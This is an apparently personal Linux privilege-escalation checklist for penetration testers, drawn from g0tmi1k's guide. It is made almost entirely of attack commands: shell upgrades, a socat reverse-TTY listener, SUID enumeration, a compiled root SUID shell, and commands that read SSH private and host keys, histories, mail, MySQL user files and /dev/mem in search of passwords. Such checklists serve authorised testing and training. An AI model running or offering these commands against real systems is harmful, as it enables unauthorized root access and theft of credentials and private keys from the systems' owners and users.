A checklist for linux privesc. Might be missing lots of things. Is mostly taken from https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Do you have a decent shell?
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -iTo get tab completion working
ctrl+z
echo $TERM && tput lines && tput cols
stty raw -echo
fg
reset
export SHELL=bash
export TERM=xterm-256color (screen when running tmux)
stty rows <num> columns <cols>Or use Socat for a full reverse tty
socat file:`tty`,raw,echo=0 tcp-listen:12345Start by checking the version and distro of the machine for possible kernel exploits, and also the sudo permissions of whatever account you have if possible.
lsb_release -a && uname -a
cat /etc/issue
cat /etc/*-release
cat /proc/version
sudo -lTo do things quick, run the LinEnum script from Rebootuser.
https://github.com/rebootuser/LinEnum
Check for plaintext passwords with it
./LinEnum.sh -t -k passwordWhat users have shells on the box?
grep -vE "nologin|false" /etc/passwdAnything in users home directories or mail?
ls -ahlR /root/
ls -ahlR /home/
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/rootAnything else in the environmental variables? symlinks?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bash_logout
env
set
find / -type l -lsAnything going on with the network? hidden services? logged in users?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
arp -a Can you sniff traffic?
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21Check for things running as root
ps aux | grep root
ps -ef | grep rootCheck the version of something that's installed
dpkg -l | grep -i PAMAny file-systems mounted or unmounted?
mount
df -h
cat /etc/fstabThen do suid/guid and other interesting files.
find / -perm -4000 -exec ls -al -print 2>/dev/null {} \;
find / -uid 0 -perm -4000 2>/dev/nullTo create our own SUID binary
print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c
gcc -o /tmp/suid /tmp/suid.c
sudo chmod +x /tmp/suid
sudo chmod +s /tmp/suid SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -g=s -type f 2>/dev/nullSUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -u=s -type f 2>/dev/nullSticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -1000 -type d 2>/dev/null Are any folders or files world writeable and executable?
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -printAnything modified recently? To check for executables updated in August
find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep AugTo find anything modified in the last 10 minutes
find / -mmin -10 -type f 2>/dev/nullAny writeable configuration files?
find /etc/ -writable -type f 2>/dev/nullOr any files containing 'config'
find . -iname '*config*'To find a specific file
find . -name suid*Files with passwords?
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;Find .conf files(recursive 4 levels) and output line number where the word 'password' is located
find / -maxdepth 7 -name *.conf -type f -exec grep -Hn password {} \; 2>/dev/nullOr other sensitive files
$ locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-passwordFind all perl files ownd by rootme in /var/www
find /var/www -user rootme -name "*.pl"Scan for string in all files in a directory
du . | awk '{print $2}'| grep -rnw "string" --colorFind password strings in memory
strings /dev/mem -n10 | grep -i PASSLook through these
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/rootThis might not work but the for loop will list crontabs for a user.
for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; doneThis is a nice script from ihack4falafel to monitor cron and echo new processes
https://github.com/ihack4falafel/OSCP/blob/master/BASH/CronJobChecker.sh
Any private keys saved elsewhere?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh\_host\_dsa_key.pub
cat /etc/ssh/ssh\_host\_dsa_key
cat /etc/ssh/ssh\_host\_rsa_key.pub
cat /etc/ssh/ssh\_host\_rsa_key
cat /etc/ssh/ssh\_host\_key.pub
cat /etc/ssh/ssh\_host\_keyWhats in var?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leasesAny files with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/Default locations sometimes for good things
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfghttps://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/
https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
https://bitvijays.github.io/LFC-VulnerableMachines.html#linux-privilege-escalation